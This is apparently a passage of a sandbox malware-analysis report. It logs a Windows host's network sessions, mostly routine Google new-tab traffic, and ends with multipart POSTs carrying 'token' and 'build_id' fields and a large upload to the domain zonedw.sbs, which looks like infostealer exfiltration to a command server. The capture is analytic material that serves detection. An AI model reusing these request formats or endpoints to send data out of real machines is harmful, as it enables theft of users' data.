2024-12-14 11:57:24 UTC	1132	IN	Data Raw: 4e 4e 6c 4e 75 51 55 64 49 65 56 49 34 55 30 74 47 4d 6d 31 71 57 43 74 61 55 48 52 56 5a 48 42 49 52 48 6f 35 4e 6d 68 4a 61 30 49 76 62 6a 6c 6c 5a 6b 6c 57 59 33 52 30 55 57 70 68 56 31 51 76 51 55 4e 6a 53 33 64 53 55 30 56 6f 54 6d 39 43 64 32 5a 59 55 47 34 30 4d 57 52 32 59 6d 39 48 65 45 56 6a 52 48 4a 4a 52 30 38 33 64 6b 5a 50 55 56 49 30 56 57 46 55 56 56 6c 44 52 33 68 4c 4b 32 78 47 57 6a 56 70 61 6e 56 56 64 55 46 6c 55 43 74 70 55 45 77 32 56 56 4e 74 4d 33 68 4e 56 32 4e 69 52 33 68 35 4d 6a 4e 69 64 53 74 57 51 58 52 50 63 31 4d 34 63 32 68 75 52 79 74 50 5a 6a 4a 49 61 57 4a 73 56 30 45 34 5a 6d 6f 77 4e 54 6c 4c 61 6e 52 47 62 58 52 57 59 55 35 69 65 56 4e 58 4d 6b 64 52 52 57 35 59 53 6d 70 34 4e 69 74 4f 57 55 45 34 56 47 68 72 52 6b Data Ascii: NNlNuQUdIeVI4U0tGMm1qWCtaUHRVZHBIRHo5NmhJa0IvbjllZklWY3R0UWphV1QvQUNjS3dSU0VoTm9Cd2ZYUG40MWR2Ym9HeEVjRHJJR083dkZPUVI0VWFUVVlDR3hLK2xGWjVpanVVdUFlUCtpUEw2VVNtM3hNV2NiR3h5MjNidStWQXRPc1M4c2huRytPZjJIaWJsV0E4ZmowNTlLanRGbXRWYU5ieVNXMkdRRW5YSmp4NitOWUE4VGhrRk
2024-12-14 11:57:24 UTC	91	IN	Data Raw: 35 35 0d 0a 6d 5a 4e 56 56 56 4c 53 31 4d 72 4f 57 68 6e 59 6d 70 74 61 32 35 53 5a 45 35 72 56 6d 68 6a 56 48 68 79 52 6a 56 4a 62 7a 52 76 65 6d 51 32 61 56 56 56 53 6b 67 33 54 31 42 4c 64 58 56 4d 54 44 4a 75 4e 6d 68 50 5a 56 52 45 4d 31 55 32 56 46 41 76 4f 57 0d 0a Data Ascii: 55mZNVVVLS1MrOWhnYmpta25SZE5rVmhjVHhyRjVJbzRvemQ2aVVVSkg3T1BLdXVMTDJuNmhPZVREM1U2VFAvOW
2024-12-14 11:57:24 UTC	1390	IN	Data Raw: 61 62 65 0d 0a 73 39 4f 68 78 4e 59 58 52 70 62 47 52 68 49 46 4e 68 5a 32 45 67 51 57 78 69 5a 58 4a 30 61 57 35 68 49 45 52 71 5a 58 4a 6d 53 67 63 6a 4e 44 45 33 4d 32 45 7a 55 6a 31 6e 63 31 39 7a 63 33 41 39 5a 55 70 36 61 6a 52 30 56 6c 41 78 65 6d 4d 77 54 45 6c 6e 4d 33 6f 34 5a 33 4a 4e 65 58 63 77 57 56 42 55 61 58 70 56 4d 48 4e 35 59 33 68 4b 55 31 5a 53 53 58 6c 56 62 33 52 54 5a 30 31 42 61 6e 52 52 53 6e 64 6e 63 41 59 5c 75 30 30 33 64 22 2c 22 7a 6c 22 3a 31 30 30 30 32 7d 2c 7b 22 67 6f 6f 67 6c 65 3a 65 6e 74 69 74 79 69 6e 66 6f 22 3a 22 43 67 6f 76 62 53 38 77 4e 44 45 7a 4e 33 41 34 45 67 31 47 62 32 39 30 59 6d 46 73 62 43 42 30 5a 57 46 74 4d 73 34 4c 5a 47 46 30 59 54 70 70 62 57 46 6e 5a 53 39 77 62 6d 63 37 59 6d 46 7a 5a 54 59 Data Ascii: abes9OhxNYXRpbGRhIFNhZ2EgQWxiZXJ0aW5hIERqZXJmSgcjNDE3M2EzUj1nc19zc3A9ZUp6ajR0VlAxemMwTElnM3o4Z3JNeXcwWVBUaXpVMHN5Y3hKU1ZSSXlVb3RTZ01BanRRSndncAY\u003d","zl":10002},{"google:entityinfo":"CgovbS8wNDEzN3A4Eg1Gb290YmFsbCB0ZWFtMs4LZGF0YTppbWFnZS9wbmc7YmFzZTY
2024-12-14 11:57:24 UTC	1367	IN	Data Raw: 5a 50 53 45 70 77 56 6e 4a 6a 54 6b 6c 50 57 55 70 34 59 30 4e 6e 65 46 59 79 54 48 6f 31 61 47 35 4f 5a 56 52 48 51 55 35 4b 51 54 6c 6b 56 32 67 78 59 6e 52 51 51 54 42 42 56 54 42 4d 61 47 35 58 4f 43 39 75 51 57 4e 61 4c 7a 42 36 53 6e 4e 58 53 6c 67 77 62 47 56 30 56 54 5a 7a 53 6d 74 6a 53 30 46 4f 54 57 70 4a 56 48 4a 53 65 57 56 30 4e 6e 4d 35 62 58 4d 76 4d 57 78 59 65 6b 6c 4c 64 7a 64 57 52 6d 64 4d 4c 32 64 52 56 6d 31 59 53 44 46 69 52 6c 4a 36 53 55 51 31 5a 55 78 52 5a 31 64 61 4f 43 39 30 65 44 64 74 65 44 51 32 5a 55 31 6a 51 31 5a 6d 4d 30 4a 72 56 46 64 7a 52 30 46 6e 52 44 52 76 57 56 64 49 4c 79 38 32 62 32 39 49 52 54 4a 35 4f 46 70 53 4d 56 52 51 52 7a 64 7a 51 31 68 43 54 6b 46 6a 61 57 68 68 52 6b 68 31 5a 58 56 32 51 6b 52 53 4e Data Ascii: ZPSEpwVnJjTklPWUp4Y0NneFYyTHo1aG5OZVRHQU5KQTlkV2gxYnRQQTBBVTBMaG5XOC9uQWNaLzB6SnNXSlgwbGV0VTZzSmtjS0FOTWpJVHJSeWV0NnM5bXMvMWxYeklLdzdWRmdML2dRVm1YSDFiRlJ6SUQ1ZUxRZ1daOC90eDdteDQ2ZU1jQ1ZmM0JrVFdzR0FnRDRvWVdILy82b29IRTJ5OFpSMVRQRzdzQ1hCTkFjaWhhRkh1ZXV2QkRSN
2024-12-14 11:57:24 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
19	192.168.2.4	50016	142.250.181.132	443

Timestamp	Bytes transferred	Direction	Data
2024-12-14 11:57:23 UTC	353	OUT	GET /async/ddljson?async=ntp:2 HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9

Session ID	Source IP	Source Port	Destination IP	Destination Port
20	192.168.2.4	50018	142.250.181.132	443

Timestamp	Bytes transferred	Direction	Data
2024-12-14 11:57:23 UTC	518	OUT	GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQjcvc0BCJDKzQEIucrNAQii0c0BCIrTzQEIntbNAQin2M0BCPnA1BUY9snNARi60s0BGOuNpRc= Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-14 11:57:24 UTC	1018	IN	HTTP/1.1 200 OK Version: 704583840 Content-Type: application/json; charset=UTF-8 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Date: Sat, 14 Dec 2024 11:57:24 GMT Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-12-14 11:57:24 UTC	372	IN	Data Raw: 32 61 61 61 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 65 6e 2d 55 53 22 2c 22 6f 67 62 22 3a 7b 22 68 74 6d 6c 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 68 74 6d 6c 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 5c 75 30 30 33 63 68 65 61 64 65 72 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 45 61 20 67 62 5f 32 64 20 67 62 5f 51 65 20 67 62 5f 71 64 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 61 6e 6e 65 72 5c 22 20 73 74 79 6c 65 5c 75 30 30 33 64 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 5c 22 5c 75 30 30 33 65 Data Ascii: 2aaa)]}'{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e
2024-12-14 11:57:24 UTC	1390	IN	Data Raw: 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 72 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4a 63 20 67 62 5f 51 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 4d 61 69 6e 20 6d 65 6e 75 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 76 67 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 76 69 65 77 62 6f 78 5c 75 30 30 33 64 5c 22 30 20 30 20 32 34 20 32 34 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 Data Ascii: class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u0
2024-12-14 11:57:24 UTC	1390	IN	Data Raw: 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 38 63 20 67 62 5f 39 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 75 64 5c 22 20 61 72 69 61 2d 6c 65 76 65 6c 5c 75 30 30 33 64 5c 22 31 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 68 65 61 64 69 6e 67 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 61 64 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 Data Ascii: 003cdiv class\u003d\"gb_wd gb_8c gb_9c\"\u003e\u003cspan class\u003d\"gb_ud\" aria-level\u003d\"1\" role\u003d\"heading\"\u003e \u003c\/span\u003e\u003cdiv class\u003d\"gb_ad\"\u003e \u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d
2024-12-14 11:57:24 UTC	1390	IN	Data Raw: 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 44 5c 22 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 68 65 69 67 68 74 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 20 76 69 65 77 42 6f 78 5c 75 30 30 33 64 5c 22 30 20 2d 39 36 30 20 39 36 30 20 39 36 30 5c 22 20 77 69 64 74 68 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 32 30 39 2d 31 32 30 71 2d 34 32 20 30 2d 37 30 2e 35 2d 32 38 2e 35 54 31 31 30 2d 32 31 37 71 30 2d 31 34 20 33 2d 32 35 2e 35 74 39 2d 32 31 2e 35 6c 32 32 38 2d 33 34 31 71 31 30 2d 31 34 20 31 35 2d 33 31 74 35 2d 33 34 76 2d 31 31 30 68 2d 32 30 71 2d 31 33 20 30 2d 32 31 2e 35 2d 38 2e 35 54 33 32 30 2d 38 31 30 71 30 2d 31 33 20 Data Ascii: ss\u003d\"gb_D\" focusable\u003d\"false\" height\u003d\"24px\" viewBox\u003d\"0 -960 960 960\" width\u003d\"24px\"\u003e \u003cpath d\u003d\"M209-120q-42 0-70.5-28.5T110-217q0-14 3-25.5t9-21.5l228-341q10-14 15-31t5-34v-110h-20q-13 0-21.5-8.5T320-810q0-13
2024-12-14 11:57:24 UTC	1390	IN	Data Raw: 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 36 2c 36 63 30 2c 31 2e 31 20 30 2e 39 2c 32 20 32 2c 32 73 32 2c 2d 30 2e 39 20 32 2c 2d 32 20 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 7a 4d 31 32 2c 38 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 32 30 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c Data Ascii: 1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM16,6c0,1.1 0.9,2 2,2s2,-0.9 2,-2 -0.9,-2 -2,-2 -2,0.9 -2,2zM12,8c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,20c1.1,0 2,-0.9 2,
2024-12-14 11:57:24 UTC	1390	IN	Data Raw: 65 6e 75 2d 63 6f 6e 74 65 6e 74 22 2c 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 62 61 72 5f 68 65 69 67 68 74 22 3a 36 30 2c 22 65 78 70 65 72 69 6d 65 6e 74 5f 69 64 22 3a 5b 33 37 30 30 33 33 38 2c 33 37 30 30 39 34 39 2c 33 37 30 31 33 38 34 5d 2c 22 69 73 5f 62 61 63 6b 75 70 5f 62 61 72 22 3a 66 61 6c 73 65 7d 2c 22 70 61 67 65 5f 68 6f 6f 6b 73 22 3a 7b 22 61 66 74 65 72 5f 62 61 72 5f 73 63 72 69 70 74 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 73 63 72 69 70 74 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 74 68 69 73 2e 67 62 61 72 5f 5c 75 30 30 33 64 74 68 69 73 2e 67 62 61 72 5f 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 5c 75 Data Ascii: enu-content","metadata":{"bar_height":60,"experiment_id":[3700338,3700949,3701384],"is_backup_bar":false},"page_hooks":{"after_bar_script":{"private_do_not_access_or_else_safe_script_wrapped_value":"this.gbar_\u003dthis.gbar_\|\|{};(function(_){var window\u
2024-12-14 11:57:24 UTC	1390	IN	Data Raw: 72 61 79 28 62 29 3b 66 6f 72 28 6c 65 74 20 64 5c 75 30 30 33 64 30 3b 64 5c 75 30 30 33 63 62 3b 64 2b 2b 29 63 5b 64 5d 5c 75 30 30 33 64 61 5b 64 5d 3b 72 65 74 75 72 6e 20 63 7d 72 65 74 75 72 6e 5b 5d 7d 3b 4c 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 5f 2e 4b 64 28 62 5c 75 30 30 33 64 5c 75 30 30 33 65 62 2e 73 75 62 73 74 72 28 30 2c 61 2e 6c 65 6e 67 74 68 2b 31 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 61 2b 5c 22 3a 5c 22 29 7d 3b 5f 2e 4d 64 5c 75 30 30 33 64 67 6c 6f 62 61 6c 54 68 69 73 2e 74 72 75 73 74 65 64 54 79 70 65 73 3b 5f 2e 4e 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73 2e 69 Data Ascii: ray(b);for(let d\u003d0;d\u003cb;d++)c[d]\u003da[d];return c}return[]};Ld\u003dfunction(a){return new _.Kd(b\u003d\u003eb.substr(0,a.length+1).toLowerCase()\u003d\u003d\u003da+\":\")};_.Md\u003dglobalThis.trustedTypes;_.Nd\u003dclass{constructor(a){this.i
2024-12-14 11:57:24 UTC	1390	IN	Data Raw: 6f 77 20 45 72 72 6f 72 28 5c 22 46 5c 22 29 3b 7d 3b 5f 2e 62 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 65 2e 74 65 73 74 28 61 29 29 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 63 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 4e 64 29 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 4e 64 29 61 5c 75 30 30 33 64 61 2e 69 3b 65 6c 73 65 20 74 68 72 6f 77 20 45 72 72 6f 72 28 5c 22 46 5c 22 29 3b 65 6c 73 65 20 61 5c 75 30 30 33 64 5f 2e 62 65 28 61 29 3b 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 64 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 5c 75 30 30 33 64 64 6f 63 75 6d 65 6e 74 29 7b 6c 65 74 20 63 2c 64 3b 62 5c 75 30 30 33 64 28 64 5c 75 30 30 33 64 28 Data Ascii: ow Error(\"F\");};_.be\u003dfunction(a){if(ae.test(a))return a};_.ce\u003dfunction(a){if(a instanceof _.Nd)if(a instanceof _.Nd)a\u003da.i;else throw Error(\"F\");else a\u003d_.be(a);return a};_.de\u003dfunction(a,b\u003ddocument){let c,d;b\u003d(d\u003d(
2024-12-14 11:57:24 UTC	828	IN	Data Raw: 75 65 72 79 53 65 6c 65 63 74 6f 72 28 61 3f 5c 22 2e 5c 22 2b 61 3a 5c 22 5c 22 29 3a 28 62 5c 75 30 30 33 64 62 7c 7c 63 2c 61 5c 75 30 30 33 64 28 61 3f 62 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 61 3f 5c 22 2e 5c 22 2b 61 3a 5c 22 5c 22 29 3a 62 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 5c 22 2a 5c 22 29 29 5b 30 5d 7c 7c 6e 75 6c 6c 29 29 3b 72 65 74 75 72 6e 20 61 7c 7c 6e 75 6c 6c 7d 3b 5c 6e 5f 2e 70 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 5f 2e 41 62 28 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 29 7b 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 73 74 79 6c 65 5c 22 3f 61 2e 73 74 79 6c 65 2e 63 73 73 54 65 78 74 5c 75 30 30 33 64 63 3a 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 63 6c Data Ascii: uerySelector(a?\".\"+a:\"\"):(b\u003db\|\|c,a\u003d(a?b.querySelectorAll(a?\".\"+a:\"\"):b.getElementsByTagName(\"*\"))[0]\|\|null));return a\|\|null};\n_.pe\u003dfunction(a,b){_.Ab(b,function(c,d){d\u003d\u003d\"style\"?a.style.cssText\u003dc:d\u003d\u003d\"cl
2024-12-14 11:57:24 UTC	387	IN	Data Raw: 31 37 63 0d 0a 5b 30 5d 29 29 3b 63 5c 75 30 30 32 36 5c 75 30 30 32 36 28 74 79 70 65 6f 66 20 63 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 73 74 72 69 6e 67 5c 22 3f 64 2e 63 6c 61 73 73 4e 61 6d 65 5c 75 30 30 33 64 63 3a 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 63 29 3f 64 2e 63 6c 61 73 73 4e 61 6d 65 5c 75 30 30 33 64 63 2e 6a 6f 69 6e 28 5c 22 20 5c 22 29 3a 5f 2e 70 65 28 64 2c 63 29 29 3b 62 2e 6c 65 6e 67 74 68 5c 75 30 30 33 65 32 5c 75 30 30 32 36 5c 75 30 30 32 36 73 65 28 61 2c 64 2c 62 29 3b 72 65 74 75 72 6e 20 64 7d 3b 73 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 66 75 6e 63 74 69 6f 6e 20 64 28 65 29 7b 65 5c 75 30 30 32 36 5c 75 30 30 32 36 62 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 79 70 Data Ascii: 17c[0]));c\u0026\u0026(typeof c\u003d\u003d\u003d\"string\"?d.className\u003dc:Array.isArray(c)?d.className\u003dc.join(\" \"):_.pe(d,c));b.length\u003e2\u0026\u0026se(a,d,b);return d};se\u003dfunction(a,b,c){function d(e){e\u0026\u0026b.appendChild(typ

Session ID	Source IP	Source Port	Destination IP	Destination Port
21	192.168.2.4	50019	142.250.181.132	443

Timestamp	Bytes transferred	Direction	Data
2024-12-14 11:57:23 UTC	353	OUT	GET /async/newtab_promos HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-14 11:57:24 UTC	933	IN	HTTP/1.1 200 OK Version: 704583840 Content-Type: application/json; charset=UTF-8 X-Content-Type-Options: nosniff Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Date: Sat, 14 Dec 2024 11:57:24 GMT Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-12-14 11:57:24 UTC	35	IN	Data Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a Data Ascii: 1d)]}'{"update":{"promos":{}}}
2024-12-14 11:57:24 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
22	192.168.2.4	50044	116.203.10.31	443

Timestamp	Bytes transferred	Direction	Data
2024-12-14 11:57:29 UTC	322	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----E37900ZU37QIMYUSJE3E User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: zonedw.sbs Content-Length: 505 Connection: Keep-Alive Cache-Control: no-cache
2024-12-14 11:57:29 UTC	505	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 45 33 37 39 30 30 5a 55 33 37 51 49 4d 59 55 53 4a 45 33 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 30 38 66 65 39 35 62 36 31 65 31 62 61 36 61 36 62 61 64 30 32 37 62 34 66 64 65 61 66 38 33 0d 0a 2d 2d 2d 2d 2d 2d 45 33 37 39 30 30 5a 55 33 37 51 49 4d 59 55 53 4a 45 33 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 45 33 37 39 30 30 5a 55 33 37 51 49 4d 59 55 53 4a 45 33 45 0d 0a 43 6f 6e 74 Data Ascii: ------E37900ZU37QIMYUSJE3EContent-Disposition: form-data; name="token"008fe95b61e1ba6a6bad027b4fdeaf83------E37900ZU37QIMYUSJE3EContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------E37900ZU37QIMYUSJE3ECont
2024-12-14 11:57:30 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Dec 2024 11:57:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-14 11:57:30 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port
23	192.168.2.4	50057	116.203.10.31	443

Timestamp	Bytes transferred	Direction	Data
2024-12-14 11:57:30 UTC	325	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----BS2D2V3W4EUAAIWBIWT2 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: zonedw.sbs Content-Length: 213453 Connection: Keep-Alive Cache-Control: no-cache
